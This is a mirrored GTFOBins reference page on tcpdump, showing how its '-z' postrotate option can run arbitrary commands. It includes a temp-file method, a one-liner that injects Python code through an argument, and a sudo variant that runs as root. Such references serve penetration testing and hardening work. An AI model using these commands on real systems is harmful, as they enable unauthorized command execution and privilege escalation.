GTFOBins.github.io/tcpdump.md at 387651d444273b7df95e61d9a45e1b6c4eacae4f

public-mirrors/GTFOBins.github.io

Fork 0

mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-01-13 07:19:08 +01:00

beaujeant 387651d444 Update tcpdump (adding one-line with arbitrary command)

2024-05-30 00:01:36 +02:00

1022 B

Raw Blame History

description

functions

These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background. In recent distributions (e.g., Debian 10 and Ubuntu 18) AppArmor limits the `postrotate-command` to a small subset of predefined commands thus preventing the execution of the following.

command

sudo

description	code
This requires several commands.	COMMAND='id' TF=$(mktemp) echo "$COMMAND" > $TF chmod +x $TF tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

descprition	code
One-liner to run arbitrary command leveraging python argument parser that does not require a space between the option -c and the value.	tcpdump -ln -i lo -w -c__import__("os").system("id") -W 1 -G 1 -z /usr/bin/python

code
COMMAND='id' TF=$(mktemp) echo "$COMMAND" > $TF chmod +x $TF sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root

1022 B Raw Blame History

1022 B

Raw Blame History